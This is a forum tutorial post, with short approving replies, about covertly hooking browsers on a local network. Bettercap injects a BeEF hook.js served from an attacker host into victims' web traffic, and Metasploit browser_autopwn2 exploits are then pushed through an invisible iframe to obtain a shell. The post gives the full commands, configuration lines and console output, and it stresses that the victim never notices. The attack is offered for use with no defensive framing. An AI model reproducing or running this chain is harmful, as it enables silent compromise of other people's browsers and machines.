Jump to content
willem_tee

Tutorial: pwn target's browser without Social Engineering -- BeeF - bettercap - Metasploit

Recommended Posts

willem_tee

Hi everyone,

This tutorial assumes that you already know your way around the basics of metasploit, bettercap and beef.

Versions used:
    - Bettercap  v1.5.8
    - Metasploit msfconsole 4.12.41-dev
    - BeeF 0.4.7.0-alpha

Objective:

The objective is to create a hook.js address in beef and inject it in any machine inside your LAN without the victim knowing or having to interact with it. Also if by any chance their browser is exploitable you can get a shell using it in conjunction with metasploit's browser_autopwn2. If you need the newest BeeF version you can clone its git form Master in a new folder and install it there. It won't intrude with your previous version.

Tests concluded:
    - Attacker's machine: Kali 2
    - Tested successfully in Victim's machines:
        OS: Windows XP SP2, 2012 Server, Win7, Mint 17.2 and OSX
        Browser: different versions of Safari, Firefox, Chrome and IE

BeeF prep:

First you have to enable metasploit extensions. In BeeF folder go to extensions/metasploit/config.yaml and set:




        enable: true



        host: ATTACKER-IP



        callback_host: ATTACKER-IP

Then close it and create a file in any folder where you will be playing from. Personally I have a folder created in the same beef location to load my stuff. The file can be called anything you want, I'll call it beef_to_msf_load. Inside it you will have to provide some parameters as they were in your extensions/metasploit/config.yaml from before. So mine contains the following info:




        load msgrpc ServerHost:ATTACKER-IP User=msf Pass=abc123 SSL=y

It goes without saying but when it says ATTACKER-IP it has to be substituted with your Kali/Backbox/Attacker-OS IP address.

Steps:




$ msfconsole -r beef_to_msf_load

 You'll have to get something similar to this:




            [*] Processing loadmsfparams for ERB directives.



            resource (loadmsfparams)> load msgrpc ServerHost:ATTACKER-IP User=msf Pass=abc123 SSL=y



            [*] MSGRPC Service:  ATTACKER-IP:55552  (SSL)



            [*] MSGRPC Username: msf



            [*] MSGRPC Password: abc123



            [*] Successfully loaded plugin: msgrpc

Load browser_autopown2:




msf> use auxiliary/server/browser_autopwn2



Open another terminal and open BeeF

 




    $ ruby beef



        or



    $ ./beef

Just load BeeF normally. You can clean previous cache, if its interfering, by attaching a -x to it so it will be a clean load. You will have to get something similar to this:




            [*] Project Creator: Wade Alcorn (@WadeAlcorn)



            [*] Connecting to Metasploit on ATTACKER-IP:55552



            [*] Successful connection with Metasploit.



            [*] Loaded 295 Metasploit exploits.



            [*] Resetting the database for BeEF.



            [*] BeEF is loading. Wait a few seconds...



            [*] 13 extensions enabled.



            [*] 572 modules enabled.

Open another termial for bettercap:




    $ bettercap -T TARGET-IP --proxy-module injectjs --js-url "http://ATTACKER-IP:3000/hook.js"

This will sniff the target's data and start injecting in their browsering that hook.js of us without the victim noticing. So you don't need any Social Engineering for them to use that link, you'll be forcing the victim's browser to silently use your hook.js URL. It works wonderfully :) you'll see it appear in your BeeF panel sooner or later.

Optional - Metasploit:

You can load the newest version of browser_autopwn called just browser_autopwn2 like we specified before:




msf> use auxiliary/server/browser_autopwn2



Set the appropriate fields which is pretty straight forward and launch it. You will be launching a good bunch of exploits sorted by metasploit by effectiveness.




msf> use -z



This will give you another URL that the user has to browse to trigger the exploits. Do we need to disconnect bettercap and reconnect using techniques such as dns spoofing? Not at all! We already have BeeF to do that for us. So go to your target in BeeF panel and open




Commands > Misc > Create invisible Iframe



This is pure magic :) use that to force the already "owned" browser read that new URL your metasploit bulk of exploits just created and you will see it triggered. The victim will never know. What can happen through is that the target's browser shows a confirmation to the user depending on the exploit used (js, adobe, etc.), browser used and version, OS, etc. 

 

Hope you like it!

  • Like 1

Share this post


Link to post
willem_tee

Cheers guys :) happy if its useful 

Share this post


Link to post
matugm

Good job :)

  • Like 1

Share this post


Link to post
cfernandez

nice.

  • Like 1

Share this post


Link to post

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
×